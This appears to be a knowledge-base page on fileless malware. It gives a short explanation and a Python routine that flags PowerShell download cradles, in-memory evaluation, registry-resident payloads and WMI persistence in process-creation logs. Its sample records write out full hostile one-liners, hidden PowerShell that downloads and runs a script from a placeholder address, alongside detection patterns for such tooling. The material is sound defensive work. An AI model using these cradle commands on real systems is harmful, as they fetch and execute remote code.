Fileless Malware

Fileless malware is malware that writes no executable to disk. The payload is typically fetched over the network (for example as the body of an HTTP response) and handed straight to an interpreter that already exists on the host, usually a shell or runtime such as the command prompt, PowerShell or the .NET framework, which runs it in memory. Because nothing is dropped on disk, file-based antivirus scanning has little to work with, and the activity is hard to tell apart from legitimate use by looking at the process tree alone, since the process doing the work (powershell.exe, for instance) is a trusted system binary. Some variants persist by storing their payload in the registry, from where a small loader pulls it back into memory after every boot.

The technique was used by the PowerWare ransomware campaign and in the high-profile DNC hack.
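The detection side of the description above, as an added example that is not part of this note or of any source it cites: a Python triage routine that scans PowerShell process-creation records (the shape of Sysmon Event ID 1 fields: parent image plus command line) for the fileless-execution indicators discussed here, namely a download cradle, an in-memory evaluator, a registry-resident payload and WMI persistence. It decodes -EncodedCommand arguments before matching, because the outer command line otherwise reveals nothing, and it shows why the process name alone is useless: every record is powershell.exe. The records, the host 203.0.113.10 (a documentation address), the script paths and the registry key are constructed for the example.

```python
"""Flag fileless-execution indicators in PowerShell process-creation records.

Added example for this note, not code from the page or any referenced source.
The records are constructed; the host, paths and registry key are invented.
"""
import base64
import re

# Indicator classes. A fileless chain is a payload source (network or registry)
# plus an in-memory evaluator; the quiet-execution flags alone are weak evidence.
INDICATORS = {
    "download_cradle": re.compile(
        r"downloadstring|downloaddata|downloadfile|net\.webclient|"
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I),
    "dynamic_eval": re.compile(
        r"invoke-expression|\biex\b|\[scriptblock\]::create|invoke-command|\bicm\b", re.I),
    "registry_payload": re.compile(
        r"get-itemproperty|\bgp\b|registry::|\bhkcu\b|\bhklm\b|"
        r"hkey_(?:current_user|local_machine)", re.I),
    "wmi_persistence": re.compile(
        r"__eventfilter|commandlineeventconsumer|__filtertoconsumerbinding|set-wmiinstance", re.I),
    "evasion_flags": re.compile(
        r"-nop\b|-noprofile|-noni\b|-noninteractive|-w(?:indowstyle)?\s+hidden|"
        r"-ep\s+bypass|-exec(?:utionpolicy)?\s+bypass", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Office and script hosts spawning PowerShell are a typical first stage.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe",
                       "excel.exe", "outlook.exe", "wmiprvse.exe"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand argument, or None if absent or invalid.
    PowerShell expects Base64 over UTF-16LE text, not UTF-8."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Return the set of indicator names a record matches.

    The Base64 blob is cut out of the command line before matching and its
    decoded text appended, so indicators hidden inside the encoded script are
    found while random Base64 characters cannot produce false hits."""
    cmdline = record["cmdline"]
    hits = set()
    decoded = decode_encoded_command(cmdline)
    text = ENC_FLAG.sub(" ", cmdline)
    if decoded is not None:
        hits.add("encoded_command")
        text += " " + decoded
    for name, rx in INDICATORS.items():
        if rx.search(text):
            hits.add(name)
    if record.get("parent", "").lower() in SCRIPT_HOST_PARENTS:
        hits.add("script_host_parent")
    return hits


def verdict(record):
    """Collapse indicators into a triage label. 'fileless' needs a payload
    source plus an evaluator (or WMI persistence); flags alone stay benign."""
    h = analyze(record)
    source = h & {"download_cradle", "registry_payload", "encoded_command"}
    if "wmi_persistence" in h or (source and "dynamic_eval" in h):
        return "fileless"
    if source or "script_host_parent" in h:
        return "suspicious"
    return "benign"


def _enc(script):
    """Encode a script the way -EncodedCommand expects (used to build sample input)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records; 203.0.113.10 is a TEST-NET-3 documentation address.
SAMPLE_RECORDS = [
    {"id": "doc-macro", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -C "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')\""},
    {"id": "encoded", "parent": "explorer.exe",
     "cmdline": "powershell.exe -enc " + _enc("IEX (IWR -UseBasicParsing http://203.0.113.10/b).Content")},
    {"id": "registry-resident", "parent": "wmiprvse.exe",
     "cmdline": "powershell.exe -w hidden -c \"iex ([Text.Encoding]::Unicode.GetString("
                "[Convert]::FromBase64String((Get-ItemProperty 'HKCU:\\Software\\Example').Payload)))\""},
    {"id": "admin-script", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
]


def triage(records=SAMPLE_RECORDS):
    """Return {record id: (verdict, sorted indicator names)} for a batch."""
    return {r["id"]: (verdict(r), sorted(analyze(r))) for r in records}


if __name__ == "__main__":
    for rid, (label, hits) in triage().items():
        print(f"{rid:18} {label:11} {', '.join(hits)}")
```

The admin record is the important negative case: it carries -NoProfile, which many administrators use, but no payload source and no evaluator, so it stays benign. In a real pipeline the same logic would be fed from Sysmon or Security event 4688 with command-line auditing enabled; without command-line capture, the records above are indistinguishable.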

Links to this page
  • A Review on Android Malware: Attacks, Countermeasures and Challenges

    It could come in various forms, such as an executable file format, a non-executable file format, or fileless.

    There is an emerging form of fileless malware in Windows known as Advanced Volatile Threats (AVTs). Such malware operates in volatile main memory, which lets it avoid detection by file-based analysis. Possible attack vectors include PowerShell, Windows Management Instrumentation (WMI), the command prompt, the .NET framework, and Remote Desktop Protocol (RDP). AVTs use scripts such as JavaScript and Visual Basic, and compiled HTML files, executed under the cover of a system process.

#security